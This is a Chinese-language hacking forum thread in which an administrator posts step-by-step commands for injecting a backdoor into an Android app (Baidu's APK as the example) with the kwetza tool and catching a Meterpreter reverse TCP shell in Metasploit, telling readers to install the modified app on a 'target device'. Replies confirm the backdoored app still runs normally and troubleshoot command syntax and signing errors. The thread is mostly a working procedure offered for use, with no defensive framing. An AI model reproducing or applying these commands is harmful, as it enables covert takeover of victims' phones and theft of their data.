搜索
查看: 11720|回复: 9

kali给APP添加shell

  [复制链接]

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-6-13 21:22:42 来自手机 | 显示全部楼层 |阅读模式 来自 甘肃
[pre]
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes
[/pre]
#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk
[pre]
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit
[/pre]
nofind.png
回复

使用道具 举报

105

主题

51

回帖

298

积分

中级会员

积分
298
发表于 2019-6-17 08:48:52 来自手机 | 显示全部楼层 来自 甘肃
感谢分享!学习了!
回复 支持 反对

使用道具 举报

0

主题

35

回帖

77

积分

vip用户

积分
77
发表于 2019-6-25 12:31:10 | 显示全部楼层
这个给APP安装了后门后,影响原APP的正常运行吗?
回复 支持 反对

使用道具 举报

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-6-25 14:56:07 来自手机 | 显示全部楼层 来自 甘肃
Richard 发表于 2019-6-25 04:31
这个给APP安装了后门后,影响原APP的正常运行吗?

不影响!
回复 支持 反对

使用道具 举报

0

主题

3

回帖

14

积分

新手开车

积分
14
发表于 2019-7-21 15:33:36 | 显示全部楼层 来自 中国
本帖最后由 qwe 于 2019-7-21 15:37 编辑

是版本的原因吗,我只能这样执行
  1. python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity
复制代码


回复 支持 反对

使用道具 举报

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-7-21 16:20:58 来自手机 | 显示全部楼层 来自 甘肃
qwe 发表于 2019-7-21 07:33
是版本的原因吗,我只能这样执行

发个图片我看看!
回复 支持 反对

使用道具 举报

0

主题

3

回帖

14

积分

新手开车

积分
14
发表于 2019-7-23 20:42:44 | 显示全部楼层 来自 中国
本帖最后由 qwe 于 2019-7-23 20:53 编辑

必须要加https/tcp 后面加AssistActivity才可以
2019-07-23 20-47-51 的屏幕截图.png
2019-07-23 20-51-42 的屏幕截图.png
回复 支持 反对

使用道具 举报

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-7-24 15:39:39 来自手机 | 显示全部楼层 来自 甘肃
qwe 发表于 2019-7-23 12:42
必须要加https/tcp 后面加AssistActivity才可以

嗯嗯!
回复 支持 反对

使用道具 举报

0

主题

6

回帖

10

积分

新手开车

积分
10

活跃会员

发表于 2020-7-27 11:20:04 | 显示全部楼层 来自 安徽宿州
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;

jarsigner 错误: java.lang.RuntimeException: 密钥库加载: Keystore was tampered with, or password was incorrect

这两个错误怎么解决呀
回复 支持 反对

使用道具 举报

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2020-7-27 12:46:18 | 显示全部楼层 来自 甘肃
bystart 发表于 2020-7-27 03:20
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuf ...

你换个APP试下,有的APP是加壳的,是没法添加后门的。
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表